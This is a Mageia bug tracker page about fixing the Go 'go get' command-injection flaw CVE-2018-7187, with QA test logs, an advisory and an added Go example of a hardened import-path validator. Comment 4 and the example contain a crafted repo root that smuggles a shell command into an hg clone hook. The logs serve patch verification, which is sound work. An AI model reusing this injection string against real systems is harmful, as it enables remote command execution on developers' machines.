Bug 22812 - golang new security issue CVE-2018-7187
Summary: golang new security issue CVE-2018-7187
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 6
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA6-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2018-03-21 19:20 CET by David Walser
Modified: 2019-02-05 16:36 CET

See Also:
Source RPM: golang-1.10-1.mga7.src.rpm
CVE:
Status comment: Patch available from Fedora



Description David Walser 2018-03-21 19:20:51 CET
Fedora has issued an advisory on March 20:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BZKVEAK5ZG3B4FJLZVMX3HIQ73RHC4VW/

The issue will be fixed upstream in 1.11.

Mageia 6 is also affected.
David Walser 2018-03-21 19:20:58 CET

Whiteboard: (none) => MGA6TOO

Comment 1 David Walser 2018-03-31 22:34:26 CEST
Fedora has issued an advisory for this on March 30:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FMNKGQPT5QQSRDYNGXR7657KUVSGFKHC/
David Walser 2018-05-04 08:36:24 CEST

Status comment: (none) => Patch available from Fedora

Comment 2 Bruno Cornec 2018-05-04 14:01:21 CEST
Version 1.10.2, which has the CVE fixes, has now been pushed to Cauldron.

Status: NEW => ASSIGNED

Comment 3 Bruno Cornec 2018-05-04 14:04:44 CEST
Version 1.9.4-4 submitted to updates_testing for Mageia 6 (with the Fedora patch added to the build).

Assignee: bruno => qa-bugs

Thomas Backlund 2018-05-06 10:50:43 CEST

Whiteboard: MGA6TOO => (none)
Version: Cauldron => 6
CC: (none) => tmb

Comment 4 Len Lawrence 2018-05-06 18:13:51 CEST
Mageia 6, x86_64

Installed mercurial before updates and tried the reproducer at https://github.com/golang/go/issues/23867

$ go get -insecure khashaev.ru/go-vuln
# cd .; hg clone -U --config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null /home/lcl/go/src/khashaev.ru/go-vuln
hello lcl
abort: repository /home/lcl/go/src/khashaev.ru/go-vuln not found!
package khashaev.ru/go-vuln: exit status 255

This output resembles that posted on the link above.

Installed these packages:
golang-bin-1.9.4-4.mga6
golang-tests-1.9.4-4.mga6
golang-shared-1.9.4-4.mga6
golang-misc-1.9.4-4.mga6
golang-src-1.9.4-4.mga6
golang-docs-1.9.4-4.mga6
golang-1.9.4-4.mga6

Tried the reproducer again:
$ go get -insecure khashaev.ru/go-vuln
package khashaev.ru/go-vuln: unrecognized import path "khashaev.ru/go-vuln" (https://khashaev.ru/go-vuln?go-get=1: invalid repo root "--config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null": invalid scheme)

That is what is expected I think, which confirms the fix.

Building docker is usually regarded as a good test of golang, but I no longer have access to SVN.
$ mgarepo co -d 6 docker
no such identity: /home/lcl/.ssh/mageia: No such file or directory
Permission denied (publickey).
svn: E170013: Unable to connect to a repository at URL 'svn+ssh://svn.mageia.org/svn/packages/updates/6/docker/current'
svn: E210002: To better debug SSH connection problems, remove the -q option from 'ssh' in the [tunnels] section of your Subversion configuration file.
svn: E210002: Network connection closed unexpectedly

No idea what any of that means.  There is certainly no file called 'mageia' in .ssh.

May have to skip the build and look for other ways to test.

CC: (none) => tarazed25

Comment 5 Len Lawrence 2018-05-06 18:27:37 CEST
Back to Hello World!

Set up go directory structure in user directory with a beginner's script and a downloaded utility package.

$ export GOPATH=/home/$USER/go/
$ cd
$ cd $GOPATH/src/
$ cat hello.go
package main
import "fmt"
import "stringutil"
func main() {
    fmt.Printf("Good morning QA\n")
    fmt.Printf(stringutil.Reverse("\nGood morning QA!"))
}
$ go run hello.go
Good morning QA
!AQ gninrom dooG

So far so good.
Comment 6 Len Lawrence 2018-05-08 16:03:07 CEST
Copied the mageia* files from .ssh on a machine on which mgarepo had always worked before (belexeuli) but even so reading from SVN failed.

Moved to belexeuli and installed the golang updates and tried again.
$ mgarepo co -d 6 docker
Warning: Permanently added 'svn.mageia.org,212.85.158.153' (ECDSA) to the list of known hosts.
Permission denied (publickey).
svn: E170013: Unable to connect to a repository at URL 'svn+ssh://svn.mageia.org/svn/packages/updates/6/docker/current'
svn: E210002: To better debug SSH connection problems, remove the -q option from 'ssh' in the [tunnels] section of your Subversion configuration file.
svn: E210002: Network connection closed unexpectedly

No idea what this tunnels business is about - certainly no mention of tunnelling in .ssh/config.  I have never had a Subversion configuration file but mgarepo used to work.  ??
Comment 7 David Walser 2018-05-08 16:10:45 CEST
Len, I guess you didn't see my e-mail on the qa-discuss list.  You're not a packager so svn+ssh won't work for you.  You have to use svn.  Check if you have a ~/.mgarepo/config file, and if not, copy one there from /etc/mgarepo.conf and uncomment the mirror line.
Comment 8 Len Lawrence 2018-05-08 18:24:10 CEST
Sorry David, if I did see your email I might not have understood its implications.  Many thanks anyway - the config file suggestion worked like a charm.  There was no local .mgarepo - not a path trodden before, which makes me think that I must have had something like unearned packager's rights before.  I do remember that a sysadmin had to give me access without my having to do anything at my end.

mgarepo worked, and so did 'bm -ls', but 'bm -l' revealed missing dependencies.  Installed those and the build went to completion.

.....................
 Wrote: /home/lcl/dev/docker/docker/RPMS/x86_64/docker-zsh-completion-17.03.1-4.mga6.x86_64.rpm
Executing(%clean): /bin/sh -e /home/lcl/dev/docker/docker/BUILDROOT/rpm-tmp.aJP4t4
+ umask 022
+ cd /home/lcl/dev/docker/docker/BUILD
+ cd moby-17.03.1-ce
+ /usr/bin/rm -rf /home/lcl/dev/docker/docker/BUILDROOT/docker-17.03.1-4.mga6.x86_64
+ exit 0
succeeded!

Looks like golang is in good shape.

Whiteboard: (none) => MGA6-64-OK

Comment 9 David Walser 2018-05-12 23:34:57 CEST
Advisory:
========================

Updated golang packages fix security vulnerability:

A flaw was found in Go Lang. The "go get" implementation in Go 1.9.4, when the
-insecure command-line option is used, does not validate the import path
(get/vcs.go only checks for "://" anywhere in the string), which allows remote
attackers to execute arbitrary OS commands via a crafted web site
(CVE-2018-7187).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7187
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BZKVEAK5ZG3B4FJLZVMX3HIQ73RHC4VW/
========================

Updated packages in core/updates_testing:
========================
golang-1.9.4-4.mga6
golang-docs-1.9.4-4.mga6
golang-misc-1.9.4-4.mga6
golang-tests-1.9.4-4.mga6
golang-src-1.9.4-4.mga6
golang-bin-1.9.4-4.mga6
golang-shared-1.9.4-4.mga6

from golang-1.9.4-4.mga6.src.rpm
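The flaw described in the advisory above, and exercised by the reproducer in comment 4, is an import-path check that only looked for "://" somewhere in the repo root string before handing it to the VCS binary. The program below is an added example, not Mageia's or upstream Go's code: it places that permissive check beside a stricter validator in the spirit of the fix, which parses the repo root as a URL and requires a non-empty, allow-listed scheme and a host before any VCS command would be built. The scheme allow-list, the function names and the rejection of a leading dash are assumptions for illustration; the "invalid scheme" wording echoes the error seen in comment 4.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// allowedSchemes is an assumed allow-list of repo-root schemes; it is not
// taken from the Go source, only chosen to show the shape of the check.
var allowedSchemes = map[string]bool{
	"http": true, "https": true, "git": true, "git+ssh": true,
	"ssh": true, "svn": true, "svn+ssh": true, "bzr+ssh": true,
}

// vulnerableCheck mirrors the advisory's description of the flawed test:
// any string containing "://" anywhere was accepted as a repo root.
func vulnerableCheck(repoRoot string) error {
	if !strings.Contains(repoRoot, "://") {
		return errors.New("missing ://")
	}
	return nil
}

// validateRepoRoot is the hardened check (hypothetical name). The repo root
// must not look like a command-line option, must parse as a URL, must carry
// an allow-listed scheme and must name a host.
func validateRepoRoot(repoRoot string) error {
	if strings.HasPrefix(repoRoot, "-") {
		return fmt.Errorf("invalid repo root %q: looks like a command-line option", repoRoot)
	}
	u, err := url.Parse(repoRoot)
	if err != nil {
		return fmt.Errorf("invalid repo root %q: %v", repoRoot, err)
	}
	if u.Scheme == "" || !allowedSchemes[strings.ToLower(u.Scheme)] {
		return fmt.Errorf("invalid repo root %q: invalid scheme", repoRoot)
	}
	if u.Host == "" {
		return fmt.Errorf("invalid repo root %q: missing host", repoRoot)
	}
	return nil
}

func main() {
	// Constructed sample inputs: two benign roots, the crafted root quoted in
	// comment 4, and a bare path with no scheme at all.
	roots := []string{
		"https://github.com/golang/go",
		"git+ssh://git.example.org/repo.git",
		"--config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null",
		"example.com/repo",
	}
	for _, root := range roots {
		fmt.Printf("%q\n  old check: %v\n  new check: %v\n", root, vulnerableCheck(root), validateRepoRoot(root))
	}
}
```

The crafted root passes the old check only because the string "https://" appears inside the injected hook command; the hardened validator rejects it at the leading dash, and would also reject it when parsed as a URL since the first path segment contains a colon.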
Len Lawrence 2018-05-13 19:13:39 CEST

Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs

Lewis Smith 2018-05-13 21:45:30 CEST

Keywords: (none) => advisory

Comment 10 Mageia Robot 2018-05-16 10:26:20 CEST
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2018-0238.html

Status: ASSIGNED => RESOLVED
Resolution: (none) => FIXED

Comment 11 Len Lawrence 2019-02-05 16:36:28 CET
mga6, x86_64

Checked the CVEs and other links; nothing for QA to do.

Set up go directory tree for user at ~/go and defined GOPATH.
$ export GOPATH=/home/$USER/go/
$ tree go
go
├── bin
└── src
    ├── hello_1.go
    ├── hello.go
    └── stringutil
        └── reverse.go

Compiled hello.go and tested it.
Checked out docker revision 1363318 from mga6 repository.

Updated golang from updates-testing.
- golang-1.11.5-1.mga6.x86_64
- golang-bin-1.11.5-1.mga6.x86_64
- golang-docs-1.11.5-1.mga6.noarch
- golang-misc-1.11.5-1.mga6.noarch
- golang-shared-1.11.5-1.mga6.x86_64
- golang-src-1.11.5-1.mga6.noarch

From go src directory:
$ go run hello.go
Good morning QA
!AQ gninrom dooG

$ go build hello.go
$ ls
hello*  hello.go  stringutil/
$ ./hello
Good morning QA
!AQ gninrom dooG

Basic compilation and running is fine.

Building docker has generally been recommended as a test of golang.
$ mgarepo co -d 6 docker
Using the svn mirror.
[...]
Checked out revision 1363406.
[...]

2019-02-05 15:19:21 (618 KB/s) - ‘docker/SOURCES/tini-fec3683.tar.gz’ saved [32156/32156]

$ cd docker
$ bm -ls
creating package list
processing package docker-%{dist_version}-%mkrel 1
building source package
Wrote: /home/lcl/dev/docker/docker/SRPMS/docker-18.06.1-1.2.mga6.src.rpm
succeeded!
$ ls
BUILD/  BUILDROOT/  RPMS/  SOURCES/  SPECS/  SRPMS/
$ bm -l
creating package list
processing package docker-%{dist_version}-%mkrel 1
building source and binary packages
error: Failed build dependencies:
	btrfs-devel is needed by docker-18.06.1-1.2.mga6.x86_64
	glibc-static-devel is needed by docker-18.06.1-1.2.mga6.x86_64
	go-md2man is needed by docker-18.06.1-1.2.mga6.x86_64
	golang-net-devel is needed by docker-18.06.1-1.2.mga6.x86_64
	pkgconfig(devmapper) is needed by docker-18.06.1-1.2.mga6.x86_64
error: failed!

Installed the dependencies but did not know how to interpret the last one, pkgconfig(devmapper).  pkgconfig is already installed.
$ bm -l
creating package list
processing package docker-%{dist_version}-%mkrel 1
building source and binary packages
error: Failed build dependencies:
	pkgconfig(devmapper) is needed by docker-18.06.1-1.2.mga6.x86_64
error: failed!
